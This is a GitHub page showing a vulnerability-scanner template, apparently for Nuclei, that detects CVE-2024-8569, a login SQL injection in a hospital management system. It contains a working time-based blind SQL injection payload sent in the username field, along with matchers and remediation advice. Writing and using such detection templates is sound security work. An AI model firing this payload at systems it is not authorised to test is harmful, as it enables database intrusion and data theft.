-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathCVE-2024-8569.yaml
32 lines (30 loc) · 1.22 KB
/
CVE-2024-8569.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
id: CVE-2024-8569
info:
name: SQL Injection in Hospital Management System
author: ProjectDiscoveryAI
severity: high
description: |
A vulnerability has been found in code-projects Hospital Management System 1.0 and classified as critical.
The manipulation of the argument username leads to SQL injection. The attack can be launched remotely.
remediation: |
To remediate this SQL injection vulnerability, ensure that all user inputs are properly sanitized and validated.
Use prepared statements or parameterized queries to prevent malicious SQL code execution.
Regularly update your software and apply security patches to address known vulnerabilities.
http:
- method: POST
path:
- "{{BaseURL}}/hms/user-login.php"
headers:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
body: |
username=admin' AND (SELECT 4737 FROM (SELECT(SLEEP(5)))tNIf) AND 'VAgb'='VAgb&password=admin123&submit=&submit=
matchers-condition: and
matchers:
- type: dsl
dsl:
- "duration>=5"
- type: regex
part: body
regex:
- "error in your SQL syntax"